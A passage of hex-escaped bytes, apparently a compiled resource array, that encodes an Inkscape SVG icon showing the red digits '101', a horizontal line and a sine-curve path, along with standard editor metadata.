\x61\x70\x65\x3a\x63\x79\x3d\x22\x38\x2e\x33\x34\x39\x32\x34\x32\
\x34\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2d\x75\x6e\x69\x74\x73\x3d\
\x22\x70\x78\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x63\x75\x72\x72\x65\x6e\x74\x2d\x6c\x61\x79\x65\x72\
\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x73\
\x68\x6f\x77\x67\x72\x69\x64\x3d\x22\x66\x61\x6c\x73\x65\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\
\x6e\x64\x6f\x77\x2d\x77\x69\x64\x74\x68\x3d\x22\x31\x39\x32\x30\
\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x77\x69\x6e\x64\x6f\x77\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x31\
\x31\x34\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\
\x6e\x64\x6f\x77\x2d\x79\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\
\x6d\x61\x78\x69\x6d\x69\x7a\x65\x64\x3d\x22\x31\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x69\x64\
\x2d\x62\x62\x6f\x78\x3d\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\
\x20\x20\x3c\x64\x65\x66\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x64\x65\x66\x73\x35\x30\x33\x36\x22\x20\x2f\x3e\x0a\x20\x20\
\x3c\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x6d\x65\x74\x61\x64\x61\x74\x61\x35\x30\x33\x39\x22\
\x3e\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\
\x20\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\x57\x6f\x72\x6b\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\
\x74\x3d\x22\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\
\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\x6d\x61\x67\x65\x2f\x73\
\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\
\x74\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\
\x79\x70\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\
\x64\x66\x3a\x72\x65\x73\x6f\x75\x72\x63\x65\x3d\x22\x68\x74\x74\
\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\
\x64\x63\x6d\x69\x74\x79\x70\x65\x2f\x53\x74\x69\x6c\x6c\x49\x6d\
\x61\x67\x65\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x3c\x2f\x64\x63\x3a\x74\
\x69\x74\x6c\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x63\
\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\
\x3a\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\x61\
\x74\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\
\x65\x6e\x65\x20\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\x3d\x22\
\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\
\x6c\x61\x79\x65\x72\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\x67\x0a\
\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x74\x65\x78\x74\x35\
\x38\x30\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\
\x65\x3d\x22\x66\x6f\x6e\x74\x2d\x73\x74\x79\x6c\x65\x3a\x6e\x6f\
\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x76\x61\x72\x69\x61\x6e\
\x74\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x77\x65\
\x69\x67\x68\x74\x3a\x39\x30\x30\x3b\x66\x6f\x6e\x74\x2d\x73\x74\
\x72\x65\x74\x63\x68\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\
\x74\x2d\x73\x69\x7a\x65\x3a\x39\x2e\x33\x33\x33\x33\x33\x33\x30\
\x32\x70\x78\x3b\x6c\x69\x6e\x65\x2d\x68\x65\x69\x67\x68\x74\x3a\
\x31\x2e\x32\x35\x3b\x66\x6f\x6e\x74\x2d\x66\x61\x6d\x69\x6c\x79\
\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\x65\x20\x50\x72\
\x6f\x27\x3b\x2d\x69\x6e\x6b\x73\x63\x61\x70\x65\x2d\x66\x6f\x6e\
\x74\x2d\x73\x70\x65\x63\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x3a\
\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\x65\x20\x50\x72\x6f\
\x20\x48\x65\x61\x76\x79\x27\x3b\x6c\x65\x74\x74\x65\x72\x2d\x73\
\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x77\x6f\x72\x64\x2d\
\x73\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x66\x69\x6c\x6c\
\x3a\x23\x66\x66\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\
\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\
\x6f\x6e\x65\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x61\x72\x69\x61\
\x2d\x6c\x61\x62\x65\x6c\x3d\x22\x31\x30\x31\x22\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x35\x38\x34\x37\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\
\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x3d\x22\x4d\
\x20\x30\x2e\x32\x37\x31\x39\x39\x39\x39\x39\x2c\x36\x2e\x33\x38\
\x38\x20\x48\x20\x34\x2e\x36\x30\x32\x36\x36\x36\x35\x20\x56\x20\
\x35\x2e\x31\x30\x30\x30\x30\x30\x31\x20\x48\x20\x33\x2e\x33\x33\
\x33\x33\x33\x33\x32\x20\x56\x20\x30\x2e\x34\x37\x30\x36\x36\x36\
\x38\x38\x20\x48\x20\x32\x2e\x31\x35\x37\x33\x33\x33\x33\x20\x43\
\x20\x31\x2e\x36\x39\x30\x36\x36\x36\x36\x2c\x30\x2e\x37\x35\x30\
\x36\x36\x36\x38\x37\x20\x31\x2e\x32\x32\x34\x2c\x30\x2e\x39\x31\
\x38\x36\x36\x36\x38\x36\x20\x30\x2e\x35\x31\x34\x36\x36\x36\x36\
\x35\x2c\x31\x2e\x30\x34\x39\x33\x33\x33\x35\x20\x56\x20\x32\x2e\
\x30\x33\x38\x36\x36\x36\x38\x20\x48\x20\x31\x2e\x37\x32\x37\x39\
\x39\x39\x39\x20\x56\x20\x35\x2e\x31\x30\x30\x30\x30\x30\x31\x20\
\x48\x20\x30\x2e\x32\x37\x31\x39\x39\x39\x39\x39\x20\x5a\x22\x20\
\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\
\x35\x38\x34\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\
\x74\x79\x6c\x65\x3d\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x64\x3d\x22\x6d\x20\x37\x2e\x39\x35\x39\x30\x32\x30\x36\x2c\
\x36\x2e\x35\x20\x63\x20\x31\x2e\x33\x39\x30\x36\x36\x36\x36\x2c\
\x30\x20\x32\x2e\x33\x33\x33\x33\x33\x33\x34\x2c\x2d\x31\x2e\x30\
\x37\x33\x33\x33\x33\x33\x20\x32\x2e\x33\x33\x33\x33\x33\x33\x34\
\x2c\x2d\x33\x2e\x30\x39\x38\x36\x36\x36\x36\x20\x30\x2c\x2d\x32\
\x2e\x30\x32\x35\x33\x33\x33\x32\x20\x2d\x30\x2e\x39\x34\x32\x36\
\x36\x36\x38\x2c\x2d\x33\x2e\x30\x34\x32\x36\x36\x36\x35\x32\x20\
\x2d\x32\x2e\x33\x33\x33\x33\x33\x33\x34\x2c\x2d\x33\x2e\x30\x34\
\x32\x36\x36\x36\x35\x32\x20\x2d\x31\x2e\x33\x39\x30\x36\x36\x36\
\x36\x2c\x30\x20\x2d\x32\x2e\x33\x33\x33\x33\x33\x33\x33\x2c\x31\
\x2e\x30\x31\x37\x33\x33\x33\x33\x32\x20\x2d\x32\x2e\x33\x33\x33\
\x33\x33\x33\x33\x2c\x33\x2e\x30\x34\x32\x36\x36\x36\x35\x32\x20\
\x43\x20\x35\x2e\x36\x32\x35\x36\x38\x37\x33\x2c\x35\x2e\x34\x32\
\x36\x36\x36\x36\x37\x20\x36\x2e\x35\x36\x38\x33\x35\x34\x2c\x36\
\x2e\x35\x20\x37\x2e\x39\x35\x39\x30\x32\x30\x36\x2c\x36\x2e\x35\
\x20\x5a\x20\x6d\x20\x30\x2c\x2d\x31\x2e\x32\x33\x32\x20\x43\x20\
\x37\x2e\x34\x36\x34\x33\x35\x33\x39\x2c\x35\x2e\x32\x36\x38\x20\
\x37\x2e\x30\x34\x34\x33\x35\x34\x2c\x34\x2e\x38\x37\x36\x30\x30\
\x30\x31\x20\x37\x2e\x30\x34\x34\x33\x35\x34\x2c\x33\x2e\x34\x30\
\x31\x33\x33\x33\x34\x20\x63\x20\x30\x2c\x2d\x31\x2e\x34\x37\x34\
\x36\x36\x36\x36\x20\x30\x2e\x34\x31\x39\x39\x39\x39\x39\x2c\x2d\
\x31\x2e\x38\x31\x30\x36\x36\x36\x36\x20\x30\x2e\x39\x31\x34\x36\
\x36\x36\x36\x2c\x2d\x31\x2e\x38\x31\x30\x36\x36\x36\x36\x20\x30\
\x2e\x34\x39\x34\x36\x36\x36\x36\x2c\x30\x20\x30\x2e\x39\x31\x34\
\x36\x36\x36\x36\x2c\x30\x2e\x33\x33\x36\x20\x30\x2e\x39\x31\x34\
\x36\x36\x36\x36\x2c\x31\x2e\x38\x31\x30\x36\x36\x36\x36\x20\x30\
\x2c\x31\x2e\x34\x37\x34\x36\x36\x36\x37\x20\x2d\x30\x2e\x34\x32\
\x2c\x31\x2e\x38\x36\x36\x36\x36\x36\x36\x20\x2d\x30\x2e\x39\x31\
\x34\x36\x36\x36\x36\x2c\x31\x2e\x38\x36\x36\x36\x36\x36\x36\x20\
\x7a\x20\x6d\x20\x30\x2c\x2d\x31\x2e\x31\x31\x39\x39\x39\x39\x39\
\x20\x63\x20\x30\x2e\x34\x32\x39\x33\x33\x33\x33\x2c\x30\x20\x30\
\x2e\x37\x34\x36\x36\x36\x36\x36\x2c\x2d\x30\x2e\x32\x39\x38\x36\
\x36\x36\x37\x20\x30\x2e\x37\x34\x36\x36\x36\x36\x36\x2c\x2d\x30\
\x2e\x37\x34\x36\x36\x36\x36\x37\x20\x30\x2c\x2d\x30\x2e\x34\x34\
\x37\x39\x39\x39\x39\x20\x2d\x30\x2e\x33\x31\x37\x33\x33\x33\x33\
\x2c\x2d\x30\x2e\x37\x34\x36\x36\x36\x36\x36\x20\x2d\x30\x2e\x37\
\x34\x36\x36\x36\x36\x36\x2c\x2d\x30\x2e\x37\x34\x36\x36\x36\x36\
\x36\x20\x2d\x30\x2e\x34\x32\x39\x33\x33\x33\x33\x2c\x30\x20\x2d\
\x30\x2e\x37\x34\x36\x36\x36\x36\x36\x2c\x30\x2e\x32\x39\x38\x36\
\x36\x36\x37\x20\x2d\x30\x2e\x37\x34\x36\x36\x36\x36\x36\x2c\x30\
\x2e\x37\x34\x36\x36\x36\x36\x36\x20\x30\x2c\x30\x2e\x34\x34\x38\
\x20\x30\x2e\x33\x31\x37\x33\x33\x33\x33\x2c\x30\x2e\x37\x34\x36\
\x36\x36\x36\x37\x20\x30\x2e\x37\x34\x36\x36\x36\x36\x36\x2c\x30\
\x2e\x37\x34\x36\x36\x36\x36\x37\x20\x7a\x22\x20\x2f\x3e\x0a\x20\
\x20\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x35\x38\x35\x31\
\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\
\x3d\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x3d\x22\
\x6d\x20\x31\x31\x2e\x34\x36\x34\x37\x30\x38\x2c\x36\x2e\x33\x38\
\x38\x20\x68\x20\x34\x2e\x33\x33\x30\x36\x36\x37\x20\x56\x20\x35\
\x2e\x31\x30\x30\x30\x30\x30\x31\x20\x48\x20\x31\x34\x2e\x35\x32\
\x36\x30\x34\x31\x20\x56\x20\x30\x2e\x34\x37\x30\x36\x36\x36\x38\
\x38\x20\x68\x20\x2d\x31\x2e\x31\x37\x36\x20\x43\x20\x31\x32\x2e\
\x38\x38\x33\x33\x37\x35\x2c\x30\x2e\x37\x35\x30\x36\x36\x36\x38\
\x37\x20\x31\x32\x2e\x34\x31\x36\x37\x30\x38\x2c\x30\x2e\x39\x31\
\x38\x36\x36\x36\x38\x36\x20\x31\x31\x2e\x37\x30\x37\x33\x37\x35\
\x2c\x31\x2e\x30\x34\x39\x33\x33\x33\x35\x20\x76\x20\x30\x2e\x39\
\x38\x39\x33\x33\x33\x33\x20\x68\x20\x31\x2e\x32\x31\x33\x33\x33\
\x33\x20\x76\x20\x33\x2e\x30\x36\x31\x33\x33\x33\x33\x20\x68\x20\
\x2d\x31\x2e\x34\x35\x36\x20\x7a\x22\x20\x2f\x3e\x0a\x20\x20\x20\
\x20\x3c\x2f\x67\x3e\x0a\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\
\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x63\x6f\x6e\x6e\x65\x63\x74\x6f\x72\x2d\x63\x75\x72\x76\x61\x74\
\x75\x72\x65\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x70\x61\x74\x68\x35\x38\x34\x35\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x64\x3d\x22\x4d\x20\x30\x2c\x37\x2e\x35\x30\x30\
\x34\x38\x37\x36\x20\x48\x20\x31\x36\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x6e\x6f\
\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x23\x30\x30\x30\x30\x30\
\x30\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\
\x2e\x39\x39\x39\x30\x32\x34\x38\x37\x70\x78\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x63\x61\x70\x3a\x62\x75\x74\x74\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3a\
\x6d\x69\x74\x65\x72\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\
\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\
\x70\x61\x74\x68\x35\x38\x39\x34\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x74\x69\x74\x6c\x65\x3d\x22\x73\x69\x6e\x28\x78\x29\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x64\x3d\x22\x20\x4d\x20\x30\x2e\x35\
\x32\x30\x30\x37\x39\x30\x38\x20\x31\x32\x2e\x31\x35\x31\x32\x34\
\x34\x39\x20\x43\x20\x30\x2e\x35\x32\x36\x33\x32\x30\x31\x34\x38\
\x38\x33\x36\x20\x31\x32\x2e\x31\x39\x33\x32\x39\x31\x34\x36\x34\
\x39\x20\x30\x2e\x35\x33\x32\x35\x36\x31\x32\x31\x37\x36\x37\x32\
\x20\x31\x32\x2e\x32\x33\x35\x33\x33\x37\x39\x39\x35\x37\x20\x30\
\x2e\x35\x33\x38\x38\x30\x32\x32\x38\x36\x35\x30\x38\x20\x31\x32\
\x2e\x32\x37\x37\x33\x35\x32\x30\x39\x35\x35\x20\x43\x20\x30\x2e\
\x35\x34\x35\x30\x34\x33\x33\x35\x35\x33\x34\x34\x20\x31\x32\x2e\
\x33\x31\x39\x33\x36\x36\x31\x39\x35\x34\x20\x30\x2e\x35\x35\x31\
\x32\x38\x34\x34\x32\x34\x31\x38\x20\x31\x32\x2e\x33\x36\x31\x33\
\x34\x37\x36\x36\x36\x31\x20\x30\x2e\x35\x35\x37\x35\x32\x35\x34\
\x39\x33\x30\x31\x36\x20\x31\x32\x2e\x34\x30\x33\x32\x36\x34\x33\
\x35\x36\x20\x43\x20\x30\x2e\x35\x36\x33\x37\x36\x36\x35\x36\x31\
\x38\x35\x32\x20\x31\x32\x2e\x34\x34\x35\x31\x38\x31\x30\x34\x35\
\x38\x20\x30\x2e\x35\x37\x30\x30\x30\x37\x36\x33\x30\x36\x38\x38\
\x20\x31\x32\x2e\x34\x38\x37\x30\x33\x32\x35\x36\x32\x20\x30\x2e\
\x35\x37\x36\x32\x34\x38\x36\x39\x39\x35\x32\x34\x20\x31\x32\x2e\
\x35\x32\x38\x37\x38\x37\x30\x34\x37\x35\x20\x43\x20\x30\x2e\x35\
\x38\x32\x34\x38\x39\x37\x36\x38\x33\x36\x31\x20\x31\x32\x2e\x35\
\x37\x30\x35\x34\x31\x35\x33\x33\x20\x30\x2e\x35\x38\x38\x37\x33\
\x30\x38\x33\x37\x31\x39\x36\x20\x31\x32\x2e\x36\x31\x32\x31\x39\
\x38\x34\x30\x31\x20\x30\x2e\x35\x39\x34\x39\x37\x31\x39\x30\x36\
\x30\x33\x33\x20\x31\x32\x2e\x36\x35\x33\x37\x32\x36\x31\x33\x38\
\x34\x20\x43\x20\x30\x2e\x36\x30\x31\x32\x31\x32\x39\x37\x34\x38\
\x36\x39\x20\x31\x32\x2e\x36\x39\x35\x32\x35\x33\x38\x37\x35\x39\
\x20\x30\x2e\x36\x30\x37\x34\x35\x34\x30\x34\x33\x37\x30\x35\x20\
\x31\x32\x2e\x37\x33\x36\x36\x35\x31\x37\x30\x33\x20\x30\x2e\x36\
\x31\x33\x36\x39\x35\x31\x31\x32\x35\x34\x31\x20\x31\x32\x2e\x37\
\x37\x37\x38\x38\x38\x34\x39\x39\x34\x20\x43\x20\x30\x2e\x36\x31\
\x39\x39\x33\x36\x31\x38\x31\x33\x37\x37\x20\x31\x32\x2e\x38\x31\
\x39\x31\x32\x35\x32\x39\x35\x38\x20\x30\x2e\x36\x32\x36\x31\x37\
\x37\x32\x35\x30\x32\x31\x33\x20\x31\x32\x2e\x38\x36\x30\x32\x30\
\x30\x30\x38\x39\x37\x20\x30\x2e\x36\x33\x32\x34\x31\x38\x33\x31\
\x39\x30\x34\x39\x20\x31\x32\x2e\x39\x30\x31\x30\x38\x32\x32\x30\
\x31\x35\x20\x43\x20\x30\x2e\x36\x33\x38\x36\x35\x39\x33\x38\x37\
\x38\x38\x35\x20\x31\x32\x2e\x39\x34\x31\x39\x36\x34\x33\x31\x33\
\x34\x20\x30\x2e\x36\x34\x34\x39\x30\x30\x34\x35\x36\x37\x32\x31\
\x20\x31\x32\x2e\x39\x38\x32\x36\x35\x32\x35\x38\x31\x31\x20\x30\
\x2e\x36\x35\x31\x31\x34\x31\x35\x32\x35\x35\x35\x37\x20\x31\x33\
\x2e\x30\x32\x33\x31\x31\x36\x38\x31\x33\x33\x20\x43\x20\x30\x2e\
\x36\x35\x37\x33\x38\x32\x35\x39\x34\x33\x39\x33\x20\x31\x33\x2e\
\x30\x36\x33\x35\x38\x31\x30\x34\x35\x36\x20\x30\x2e\x36\x36\x33\
\x36\x32\x33\x36\x36\x33\x32\x32\x39\x20\x31\x33\x2e\x31\x30\x33\
\x38\x31\x39\x38\x39\x31\x36\x20\x30\x2e\x36\x36\x39\x38\x36\x34\
\x37\x33\x32\x30\x36\x35\x20\x31\x33\x2e\x31\x34\x33\x38\x30\x33\
\x36\x39\x35\x31\x20\x43\x20\x30\x2e\x36\x37\x36\x31\x30\x35\x38\
\x30\x30\x39\x30\x31\x20\x31\x33\x2e\x31\x38\x33\x37\x38\x37\x34\
\x39\x38\x35\x20\x30\x2e\x36\x38\x32\x33\x34\x36\x38\x36\x39\x37\
\x33\x37\x20\x31\x33\x2e\x32\x32\x33\x35\x31\x34\x37\x32\x32\x31\
\x20\x30\x2e\x36\x38\x38\x35\x38\x37\x39\x33\x38\x35\x37\x33\x20\
\x31\x33\x2e\x32\x36\x32\x39\x35\x36\x32\x39\x30\x33\x20\x43\x20\
\x30\x2e\x36\x39\x34\x38\x32\x39\x30\x30\x37\x34\x30\x39\x20\x31\
\x33\x2e\x33\x30\x32\x33\x39\x37\x38\x35\x38\x34\x20\x30\x2e\x37\
\x30\x31\x30\x37\x30\x30\x37\x36\x32\x34\x35\x20\x31\x33\x2e\x33\
\x34\x31\x35\x35\x32\x30\x34\x39\x37\x20\x30\x2e\x37\x30\x37\x33\
\x31\x31\x31\x34\x35\x30\x38\x31\x20\x31\x33\x2e\x33\x38\x30\x33\
\x39\x30\x34\x31\x34\x31\x20\x43\x20\x30\x2e\x37\x31\x33\x35\x35\
\x32\x32\x31\x33\x39\x31\x37\x20\x31\x33\x2e\x34\x31\x39\x32\x32\
\x38\x37\x37\x38\x36\x20\x30\x2e\x37\x31\x39\x37\x39\x33\x32\x38\
\x32\x37\x35\x33\x20\x31\x33\x2e\x34\x35\x37\x37\x34\x39\x34\x31\
\x33\x34\x20\x30\x2e\x37\x32\x36\x30\x33\x34\x33\x35\x31\x35\x38\
\x39\x20\x31\x33\x2e\x34\x39\x35\x39\x32\x34\x35\x33\x38\x33\x20\
\x43\x20\x30\x2e\x37\x33\x32\x32\x37\x35\x34\x32\x30\x34\x32\x36\
\x20\x31\x33\x2e\x35\x33\x34\x30\x39\x39\x36\x36\x33\x31\x20\x30\
\x2e\x37\x33\x38\x35\x31\x36\x34\x38\x39\x32\x36\x31\x20\x31\x33\
\x2e\x35\x37\x31\x39\x32\x37\x31\x39\x36\x37\x20\x30\x2e\x37\x34\
\x34\x37\x35\x37\x35\x35\x38\x30\x39\x38\x20\x31\x33\x2e\x36\x30\
\x39\x33\x38\x30\x30\x37\x31\x33\x20\x43\x20\x30\x2e\x37\x35\x30\
\x39\x39\x38\x36\x32\x36\x39\x33\x34\x20\x31\x33\x2e\x36\x34\x36\
\x38\x33\x32\x39\x34\x35\x39\x20\x30\x2e\x37\x35\x37\x32\x33\x39\
\x36\x39\x35\x37\x37\x20\x31\x33\x2e\x36\x38\x33\x39\x30\x38\x39\
\x30\x34\x39\x20\x30\x2e\x37\x36\x33\x34\x38\x30\x37\x36\x34\x36\
\x30\x36\x20\x31\x33\x2e\x37\x32\x30\x35\x38\x31\x36\x33\x34\x39\
\x20\x43\x20\x30\x2e\x37\x36\x39\x37\x32\x31\x38\x33\x33\x34\x34\
\x32\x20\x31\x33\x2e\x37\x35\x37\x32\x35\x34\x33\x36\x35\x20\x30\
\x2e\x37\x37\x35\x39\x36\x32\x39\x30\x32\x32\x37\x38\x20\x31\x33\
\x2e\x37\x39\x33\x35\x32\x31\x34\x33\x37\x37\x20\x30\x2e\x37\x38\
\x32\x32\x30\x33\x39\x37\x31\x31\x31\x34\x20\x31\x33\x2e\x38\x32\
\x39\x33\x35\x37\x33\x33\x35\x20\x43\x20\x30\x2e\x37\x38\x38\x34\
\x34\x35\x30\x33\x39\x39\x35\x20\x31\x33\x2e\x38\x36\x35\x31\x39\
\x33\x32\x33\x32\x32\x20\x30\x2e\x37\x39\x34\x36\x38\x36\x31\x30\
\x38\x37\x38\x36\x20\x31\x33\x2e\x39\x30\x30\x35\x39\x35\x33\x35\
\x37\x35\x20\x30\x2e\x38\x30\x30\x39\x32\x37\x31\x37\x37\x36\x32\
\x32\x20\x31\x33\x2e\x39\x33\x35\x35\x33\x39\x30\x32\x37\x31\x20\
\x43\x20\x30\x2e\x38\x30\x37\x31\x36\x38\x32\x34\x36\x34\x35\x38\
\x20\x31\x33\x2e\x39\x37\x30\x34\x38\x32\x36\x39\x36\x38\x20\x30\
\x2e\x38\x31\x33\x34\x30\x39\x33\x31\x35\x32\x39\x34\x20\x31\x34\
\x2e\x30\x30\x34\x39\x36\x35\x31\x35\x30\x34\x20\x30\x2e\x38\x31\
\x39\x36\x35\x30\x33\x38\x34\x31\x33\x20\x31\x34\x2e\x30\x33\x38\
\x39\x36\x32\x35\x37\x36\x39\x20\x43\x20\x30\x2e\x38\x32\x35\x38\
\x39\x31\x34\x35\x32\x39\x36\x36\x20\x31\x34\x2e\x30\x37\x32\x39\
\x36\x30\x30\x30\x33\x35\x20\x30\x2e\x38\x33\x32\x31\x33\x32\x35\
\x32\x31\x38\x30\x32\x20\x31\x34\x2e\x31\x30\x36\x34\x36\x39\x34\
\x38\x32\x37\x20\x30\x2e\x38\x33\x38\x33\x37\x33\x35\x39\x30\x36\
\x33\x38\x20\x31\x34\x2e\x31\x33\x39\x34\x36\x38\x31\x31\x33\x33\
\x20\x43\x20\x30\x2e\x38\x34\x34\x36\x31\x34\x36\x35\x39\x34\x37\
\x34\x20\x31\x34\x2e\x31\x37\x32\x34\x36\x36\x37\x34\x33\x39\x20\
\x30\x2e\x38\x35\x30\x38\x35\x35\x37\x32\x38\x33\x31\x20\x31\x34\
\x2e\x32\x30\x34\x39\x35\x31\x34\x35\x30\x33\x20\x30\x2e\x38\x35\
\x37\x30\x39\x36\x37\x39\x37\x31\x34\x36\x20\x31\x34\x2e\x32\x33\
\x36\x39\x30\x30\x32\x37\x36\x20\x43\x20\x30\x2e\x38\x36\x33\x33\
\x33\x37\x38\x36\x35\x39\x38\x33\x20\x31\x34\x2e\x32\x36\x38\x38\
\x34\x39\x31\x30\x31\x37\x20\x30\x2e\x38\x36\x39\x35\x37\x38\x39\
\x33\x34\x38\x31\x38\x20\x31\x34\x2e\x33\x30\x30\x32\x35\x38\x38\
\x32\x30\x37\x20\x30\x2e\x38\x37\x35\x38\x32\x30\x30\x30\x33\x36\
\x35\x35\x20\x31\x34\x2e\x33\x33\x31\x31\x30\x38\x34\x35\x35\x34\
\x20\x43\x20\x30\x2e\x38\x38\x32\x30\x36\x31\x30\x37\x32\x34\x39\
\x31\x20\x31\x34\x2e\x33\x36\x31\x39\x35\x38\x30\x39\x30\x31\x20\
\x30\x2e\x38\x38\x38\x33\x30\x32\x31\x34\x31\x33\x32\x37\x20\x31\
\x34\x2e\x33\x39\x32\x32\x34\x34\x32\x36\x38\x39\x20\x30\x2e\x38\
\x39\x34\x35\x34\x33\x32\x31\x30\x31\x36\x33\x20\x31\x34\x2e\x34\
\x32\x31\x39\x34\x37\x30\x32\x35\x35\x20\x43\x20\x30\x2e\x39\x30\
\x30\x37\x38\x34\x32\x37\x38\x39\x39\x39\x20\x31\x34\x2e\x34\x35\
\x31\x36\x34\x39\x37\x38\x32\x31\x20\x30\x2e\x39\x30\x37\x30\x32\
\x35\x33\x34\x37\x38\x33\x35\x20\x31\x34\x2e\x34\x38\x30\x37\x36\
\x35\x36\x30\x34\x37\x20\x30\x2e\x39\x31\x33\x32\x36\x36\x34\x31\
\x36\x36\x37\x31\x20\x31\x34\x2e\x35\x30\x39\x32\x37\x35\x35\x36\
\x39\x20\x43\x20\x30\x2e\x39\x31\x39\x35\x30\x37\x34\x38\x35\x35\
\x30\x37\x20\x31\x34\x2e\x35\x33\x37\x37\x38\x35\x35\x33\x33\x34\
\x20\x30\x2e\x39\x32\x35\x37\x34\x38\x35\x35\x34\x33\x34\x33\x20\
